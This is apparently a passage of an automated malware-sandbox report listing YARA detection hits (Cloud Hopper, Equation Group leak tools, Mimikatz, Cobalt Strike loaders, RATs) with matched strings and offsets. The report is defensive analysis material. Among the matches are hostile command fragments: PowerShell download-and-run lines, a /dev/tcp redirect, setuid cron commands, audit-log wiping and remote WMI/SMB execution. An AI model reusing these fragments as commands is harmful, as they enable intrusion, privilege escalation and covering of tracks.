- 0x371fe:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B
- 0x37214:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9
- 0x3722a:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_Malware_3 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x373c1:$s6: operator ""
- 0x377c8:$s6: operator ""
- 0x37f98:$s6: operator ""
- 0x36ef4:$s7: zok]\\\ZZYYY666564444
- 0x373d2:$s7: zok]\\\ZZYYY666564444
- 0x37fcb:$s7: zok]\\\ZZYYY666564444
- 0x3b2df:$s7: zok]\\\ZZYYY666564444
- 0x373ed:$s11: InvokeMainViaCRT
- 0x377d9:$s11: InvokeMainViaCRT
- 0x37403:$s12: .?AVAES@@
- 0x377ef:$s12: .?AVAES@@
- 0x37412:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32
- 0x37428:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03
- 0x3743e:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_Malware_5 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x3797f:$x1: CWINDOWSSYSTEMROOT
- 0x37996:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK
- 0x379bb:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY
- 0x379db:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU
- 0x379f9:$s7: FALLINLOVE
- 0x37a09:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_WmiDLL_inMemory | Malware related to Operation Cloud Hopper - Page 25 | Florian Roth | - 0x35ac9:$s1: wmi.dll 2>&1
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | VBS_WMIExec_Tool_Apr17_1 | Tools related to Operation Cloud Hopper | Florian Roth | - 0x36bb9:$x1: strNetUse = "cmd.exe /c net use \\" & host
- 0x36be8:$x2: localcmd = "cmd.exe /c " & command
- 0x36c10:$x3: & " > " & TempFile & " 2>&1" '2>&1 err
- 0x36c3c:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err
- 0x36c89:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll"
- 0x36cd1:$a1: WMIEXEC ERROR: Command ->
- 0x36cf0:$a2: WMIEXEC : Command result will output to
- 0x36d1c:$a3: WMIEXEC : Target ->
- 0x36d34:$a4: WMIEXEC : Login -> OK
- 0x36d4e:$a5: WMIEXEC : Process created. PID:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | RevengeRAT_Sep17 | Detects RevengeRAT malware | Florian Roth | - 0x78a4:$x1: Nuclear Explosion.g.resources
- 0x78f3:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41
- 0x7920:$x5: \RevengeRAT\
- 0x7931:$x6: Revenge-RAT client has been successfully installed.
- 0x7969:$x7: Nuclear Explosion.exe
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0x38676:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x3869d:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x386e0:$s3: MimiPenguin Results:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | POSHSPY_Malware | Detects | Florian Roth | - 0xfb6e:$x1: function sWP($cN, $pN, $aK, $aI)
- 0xfb93:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2
- 0xfbbf:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',
- 0xfc0f:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA
- 0xfc3a:$x5: $exeRes = exePldRoutine
- 0xfc56:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0xf6e3:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0xf75a:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | FIN7_Backdoor_Aug17 | Detects Word Dropper from Proofpoint FIN7 Report | Florian Roth | - 0xb6f9:$x1: wscript.exe //b /e:jscript C:\Users\
- 0xb722:$x2: wscript.exe /b /e:jscript C:\Users\
- 0xb74a:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe
- 0xb797:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore
- 0xb7d1:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore
- 0xb80a:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt
- 0xb839:$s1: /?page=wait
- 0xb849:$a1: autoit3.exe
- 0xb859:$a2: dumpcap.exe
- 0xb869:$a3: tshark.exe
- 0xb878:$a4: prl_cc.exe
- 0xb887:$v1: vmware
- 0xb892:$v2: PCI\\VEN_80EE&DEV_CAFE
- 0xb8ad:$v3: VMWVMCIHOSTDEV
- 0xb8c0:$c1: apowershell
- 0xb8d0:$c2: wpowershell
- 0xb8e0:$c3: get_passwords
- 0xb8f2:$c4: kill_process
- 0xb903:$c5: get_screen
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | PUA_CryptoMiner_Jan19_1 | Detects Crypto Miner strings | Florian Roth | - 0x15b04:$s2: -t, --threads=N number of miner threads (default: number of processors)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_SMBExec | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x1644d:$x1: Invoke-SMBExec -Target
- 0x16468:$x2: $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
- 0x164d5:$s1: Write-Output "Command executed with service $SMB_service on $Target"
- 0x1651e:$s2: $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- 0x16581:$s3: $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_WMIExec_Gen_1 | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x16739:$x1: Invoke-WMIExec
- 0x1674d:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))
- 0x167bd:$s1: Import-Module $PWD\Invoke-TheHash.ps1
- 0x167e7:$s2: Import-Module $PWD\Invoke-SMBClient.ps1
- 0x16813:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList
- 0x16867:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_SMBExec_Invoke_WMIExec_1 | Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x16a45:$s1: $process_ID = $process_ID -replace "-00-00",""
- 0x16a78:$s2: Write-Output "$Target did not respond"
- 0x16aa3:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_WMIExec_Gen | Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x16c9e:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
- 0x16ce3:$s2: $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- 0x16d4e:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WMImplant | Auto-generated rule - file WMImplant.ps1 | Florian Roth | - 0x38c96:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential
- 0x38cca:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x38d35:$x4: -Download -RemoteFile C:\passwords.txt
- 0x38d60:$x5: -Command 'powershell.exe -command "Enable-PSRemoting
- 0x38d99:$x6: Invoke-WMImplant
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | FVEY_ShadowBrokers_Jan17_Screen_Strings | Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits | Florian Roth | - 0x2191f:$x3: PeddleCheap
- 0x2738b:$x3: PeddleCheap
- 0x1fe76:$d4: Mcl_NtMemory
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_OSiRis | Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 | Florian Roth | - 0x3882a:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target
- 0x3874c:$x2: Invoke-OSiRis
- 0x3889d:$x2: Invoke-OSiRis
- 0x388af:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}
- 0x388f5:$x4: Device Guard Bypass Command Execution
- 0x3891f:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath
- 0x3882a:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
- 0x3895f:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | MAL_KHRAT_script | Rule derived from KHRAT script but can match on other malicious scripts as well | Florian Roth | - 0x7d16:$x1: CreateObject("WScript.Shell").Run "schtasks /create /sc MINUTE /tn
- 0x7d5d:$x2: CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication
- 0x7dbc:$x3: <registration progid="ff010f" classid="{e934870c-b429-4d0d-acf1-eef338b92c4b}" >
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_powershell | Detects powershell script used in Operation Wilted Tulip | Florian Roth | - 0xd20b:$x1: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_Windows_UM_Task | Detects a Windows scheduled task as used in Operation Wilted Tulip | Florian Roth | - 0xda7c:$c1: svchost64.swp",checkUpdate
- 0xda9b:$c2: svchost64.swp,checkUpdate
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_WindowsTask | Detects hack tool used in Operation Wilted Tulip - Windows Tasks | Florian Roth | - 0xdc59:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_ReflectiveLoader | Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Florian Roth | - 0xe978:$x1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x17ef3:$x1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0xe9ae:$x2: %d is an x86 process (can't inject x64 content)
- 0x17f29:$x2: %d is an x86 process (can't inject x64 content)
- 0xe9e2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x17ea5:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0xea30:$x4: Failed to impersonate token from %d (%u)
- 0xea5d:$x5: Failed to impersonate logged on user %d (%u)
- 0xea8e:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
- 0x17f96:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Impacket_Tools_Generic_1 | Compiled Impacket Tools | Florian Roth | - 0x368ab:$s1: bpywintypes27.dll
- 0x368c1:$s2: hZFtPC
- 0xba3c:$s3: impacket
- 0xba4e:$s3: impacket
- 0xba61:$s3: impacket
- 0x3437e:$s3: impacket
- 0x3444a:$s3: impacket
- 0x344e8:$s3: impacket
- 0x34645:$s3: impacket
- 0x34715:$s3: impacket
- 0x347ae:$s3: impacket
- 0x34906:$s3: impacket
- 0x34a82:$s3: impacket
- 0x34b47:$s3: impacket
- 0x34bf2:$s3: impacket
- 0x34cbb:$s3: impacket
- 0x34d59:$s3: impacket
- 0x34e11:$s3: impacket
- 0x34ebb:$s3: impacket
- 0x35021:$s3: impacket
- 0x350e4:$s3: impacket
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Auditcleaner | Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner | Florian Roth | - 0x2d06a:$x1: > /var/log/audit/audit.log; rm -f .
- 0x2d092:$x2: Pastables to run on target:
- 0x2d0b2:$x3: cp /var/log/audit/audit.log .tmp
- 0x2d0d7:$l1: Here is the first good cron session from
- 0x2d104:$l2: No need to clean LOGIN lines.
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_elgingamble | Equation Group hack tool leaked by ShadowBrokers- file elgingamble | Florian Roth | - 0x2f213:$x1: * * * * * root chown root %s; chmod 4755 %s; %s
- 0x2f247:$x2: [-] kernel not vulnerable
- 0x3174a:$x2: [-] kernel not vulnerable
- 0x31958:$x2: [-] kernel not vulnerable
- 0x31b42:$x2: [-] kernel not vulnerable
- 0x2f265:$x3: [-] failed to spawn shell: %s
- 0x2f287:$x4: -s shell Use shell instead of %s
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_cmsd | Equation Group hack tool leaked by ShadowBrokers- file cmsd | Florian Roth | - 0x2f42b:$x1: usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]
- 0x2f46a:$x2: error: not vulnerable
- 0x2f484:$s1: port=%d connected!
- 0x2f49c:$s2: xxx.XXXXXX
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_ebbshave | Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5 | Florian Roth | - 0x2f62b:$s1: executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s
- 0x2f669:$s2: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772
- 0x2f6a7:$s3: version 1 - Start with option #18 first, if it fails then try this option
- 0x2f6f5:$s4: %s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_eggbasket | Equation Group hack tool leaked by ShadowBrokers- file eggbasket | Florian Roth | - 0x2f8c8:$x1: # Building Shellcode into exploit.
- 0x2f8ef:$x2: %s -w /index.html -v 3.5 -t 10 -c "/usr/openwin/bin/xterm -d 555.1.2.2:0&" -d 10.0.0.1 -p 80
- 0x2f951:$x3: # STARTING EXHAUSTIVE ATTACK AGAINST
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_sambal | Equation Group hack tool leaked by ShadowBrokers- file sambal | Florian Roth | - 0x2fd16:$s1: + Bruteforce mode.
- 0x2fd2d:$s3: + Host is not running samba!
- 0x2fd4e:$s4: + connecting back to: [%d.%d.%d.%d:45295]
- 0x2fd7c:$s5: + Exploit failed, try -b to bruteforce.
- 0x2fda8:$s7: Usage: %s [-bBcCdfprsStv] [host]
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_envisioncollision | Equation Group hack tool leaked by ShadowBrokers- file envisioncollision | Florian Roth | - 0x30168:$x1: mysql \$D --host=\$H --user=\$U --password=\"\$P\" -e \"select * from \$T
- 0x301b6:$x2: Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\"sleep 500|nc
- 0x30201:$s3: $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- 0x30247:$s4: $url = $host . "/admin/index.php?adsess=" . $enter . "&app=core&module=applications§ion=hooks&do=install_hook";
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_cmsex | Equation Group hack tool leaked by ShadowBrokers- file cmsex | Florian Roth | - 0x30436:$x1: Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>)
- 0x30491:$x2: -i target ip address / hostname
- 0x304b6:$x3: Note: Choosing the correct target type is a bit of guesswork.
- 0x304f8:$x4: Solaris rpc.cmsd remote root exploit
- 0x30521:$x5: If one choice fails, you may want to try another.
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_DUL | Equation Group hack tool leaked by ShadowBrokers- file DUL | Florian Roth | - 0x3086d:$x1: ?Usage: %s <shellcode> <output_file>
- 0x30896:$x2: Here is the decoder+(encoded-decoder)+payload
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_slugger2 | Equation Group hack tool leaked by ShadowBrokers- file slugger2 | Florian Roth | - 0x30a45:$x1: usage: %s hostip port cmd [printer_name]
- 0x30a72:$x2: command must be less than 61 chars
- 0x30a99:$s1: __rw_read_waiting
- 0x306da:$s2: completed.1
- 0x30aaf:$s2: completed.1
- 0x30abf:$s3: __mutexkind
- 0x30acf:$s4: __rw_pshared
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_jackpop | Equation Group hack tool leaked by ShadowBrokers- file jackpop | Florian Roth | - 0x30f27:$x1: %x:%d --> %x:%d %d bytes
- 0x30f45:$s1: client: can't bind to local address, are you root?
- 0x30f7c:$s2: Unable to register port
- 0x30f98:$s3: Could not resolve destination
- 0x30fba:$s4: raw troubles
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_epoxyresin_v1_0_0 | Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1 | Florian Roth | - 0x2f247:$x1: [-] kernel not vulnerable
- 0x3174a:$x1: [-] kernel not vulnerable
- 0x31958:$x1: [-] kernel not vulnerable
- 0x31b42:$x1: [-] kernel not vulnerable
- 0x31768:$s1: .tmp.%d.XXXXXX
- 0x3177b:$s2: [-] couldn't create temp file
- 0x3179d:$s3: /boot/System.map-%s
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_estesfox | Equation Group hack tool leaked by ShadowBrokers- file estesfox | Florian Roth | - 0x326c1:$x1: chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_elatedmonkey_1_0_1_1 | Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh | Florian Roth | - 0x32894:$x3: Usage: $0 ( -s IP PORT | CMD )
- 0x328b7:$s5: os.execl("/bin/sh", "/bin/sh", "-c", "$CMD")
- 0x328e9:$s13: PHP_SCRIPT="$HOME/public_html/info$X.php"
- 0x32918:$s15: cat > /dev/tcp/127.0.0.1/80 <<END
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__ftshell_ftshell_v3_10_3_0 | Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 | Florian Roth | - 0x32ced:$s1: set uRemoteUploadCommand "[exec cat /current/.ourtn-ftshell-upcommand]"
- 0x32d39:$s2: send "\[ \"\$BASH\" = \"/bin/bash\" -o \"\$SHELL\" = \"/bin/bash\" \] &&
- 0x32d86:$s3: system rm -f /current/tmp/ftshell.latest
- 0x32db3:$s4: # ftshell -- File Transfer Shell
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__scanner_scanner_v2_1_2 | Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2 | Florian Roth | - 0x1fe16:$s1: Welcome to the network scanning tool
- 0x32f79:$s1: Welcome to the network scanning tool
- 0x32fa2:$s2: Scanning port %d
- 0x32fb7:$s3: /current/down/cmdout/scans
- 0x32fd6:$s4: Scan for SSH version
- 0x32fef:$s5: program vers proto port service
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__ghost_sparc_ghost_x86_3 | Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86 | Florian Roth | - 0x331b7:$x1: Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target
- 0x331f9:$x2: Sending shellcode as part of an open command...
- 0x3322d:$x3: cmdshellcode
- 0x3323e:$x4: You will not be able to run the shellcode. Exiting...
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__jparsescan_parsescan_5 | Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan | Florian Roth | - 0x3364e:$s1: # default is to dump out all scanned hosts found
- 0x33683:$s2: $bool .= " -r " if (/mibiisa.* -r/);
- 0x336ac:$s3: sadmind is available on two ports, this also works)
- 0x336e4:$s4: -x IP gives \"hostname:# users:load ...\" if positive xwin scan
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__funnelout_v4_1_0_1 | Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl | Florian Roth | - 0x338c8:$s1: header("Set-Cookie: bbsessionhash=" . \$hash . "; path=/; HttpOnly");
- 0x33912:$s2: if ($code =~ /proxyhost/) {
- 0x33932:$s3: \$rk[1] = \$rk[1] - 1;
- 0x3394d:$s4: #existsUser($u) or die "User '$u' does not exist in database.\n";
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__magicjack_v1_1_0_0_client | Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py | Florian Roth | - 0x33b44:$s1: temp = ((left >> 1) ^ right) & 0x55555555
- 0x33b72:$s2: right ^= (temp << 16) & 0xffffffff
- 0x33b9a:$s3: tempresult = ""
- 0x33bae:$s4: num = self.bytes2long(data)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__ftshell | Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 | Florian Roth | - 0x33d63:$s1: if { [string length $uRemoteUploadCommand]
- 0x33d92:$s2: processUpload
- 0x33da4:$s3: global dothisreallyquiet
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_noclient_3_3_2 | Equation Group hack tool set | Florian Roth | - 0x2a590:$x1: 127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning
- 0x2a5e6:$x2: iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;
- 0x2a62f:$x3: noclient: failed to execute %s: %s
- 0x2a656:$x4: sh -c "ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx "
- 0x2a690:$s5: Attempting connection from 0.0.0.0:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_Eternalromance | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x1e885:$x1: [-] Error: Exploit choice not supported for target OS!!
- 0x1e8c1:$x2: Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed
- 0x1e90d:$x3: [-] Error: Backdoor not present on target
- 0x1e93b:$x4: *********** TARGET ARCHITECTURE IS X64 ************
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_Gen2 | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x1ef09:$s1: [+] Setting password : (NULL)
- 0x1ef2b:$s2: [-] TbBuffCpy() failed!
- 0x1ef47:$s3: [+] SMB negotiation
- 0x1ef5f:$s4: 12345678-1234-ABCD-EF00-0123456789AB
- 0x1ef88:$s5: Value must end with 0000 (2 NULLs)
- 0x1efaf:$s6: [*] Configuring Payload
- 0x1efcb:$s7: [*] Connecting to listener
- 0x1efeb:$op1: B0 42 40 00 89 44 24 30 C7 44 24 34
- 0x1effd:$op2: EB 59 8B 4C 24 10 68 1C 46
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_ntevt | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x20329:$x1: c:\ntevt.pdb
- 0x2033a:$s1: ARASPVU
- 0x20347:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4
- 0x23b10:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4
- 0x2035d:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88
- 0x23b26:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88
- 0x20373:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33
- 0x23b3c:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x27138:$s1: PQRAPAQSTUVWARASATAUAVAW
- 0x27155:$s2: SQRUWVAWAVAUATASARAQAP
- 0x27170:$s3: iijymqp
- 0x2717c:$s4: AWAVAUATASARAQI
- 0x27190:$s5: WARASATAUAVM
- 0x271a2:$op1: 0C 80 30 02 48 83 C2 01 49 83 E9 01 75 E1 C3 CC
- 0x271b8:$op2: E8 10 66 0D 00 80 66 31 02 48 83 C2 02 49 83 E9
- 0x271ce:$op3: 48 B8 53 A5 E1 41 D4 F1 07 00 48 33
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x27571:$x1: DFReader.exe logfile AESKey [-j] [-o outputfilename]
- 0x275aa:$x2: Double Feature Target Version
- 0x275cc:$x3: DoubleFeature Process ID
- 0x275ea:$op1: A1 30 21 41 00 89 85 D8 FC FF FF A1 34 21 41 00
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x27b85:$x1: * Listening Post DLL %s() returned error code %d.
- 0x27bbb:$s1: WsaErrorTooManyProcesses
- 0x1e27e:$s2: NtErrorMoreProcessingRequired
- 0x27bd8:$s2: NtErrorMoreProcessingRequired
- 0x1bc81:$s3: Connection closed by remote host (TCP Ack/Fin)
- 0x27bfa:$s3: Connection closed by remote host (TCP Ack/Fin)
- 0x27c2d:$s4: ServerErrorBadNamePassword
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_scanner_output | Detects output generated by EQGRP scanner.exe | Florian Roth | - 0x1b85d:$s0: # scanning ip
- 0x1fdf7:$s0: # scanning ip
- 0x1b871:$s1: # Scan for windows boxes
- 0x1b88e:$s2: Going into send
- 0x1b8a2:$s3: # Does not work
- 0x1b8b6:$s4: You are the weakest link, goodbye
- 0x1b8dc:$s5: rpc Scan for RPC folks
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_xtremerat_1 | Yara detected Xtreme RAT | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_PupyRAT | Yara detected PupyRAT | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | dragos_crashoverride_moduleStrings | IEC-104 Interaction Module Program Strings | Dragos Inc | - 0x17942:$s1: IEC-104 client: ip=%s; port=%s; ASDU=%u
- 0x17933:$s5: iec104.log
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Obfuscated_VBS_April17 | Detects cloaked Mimikatz in VBS obfuscation | Florian Roth | - 0x1b546:$s1: ::::::ExecuteGlobal unescape(unescape(
|
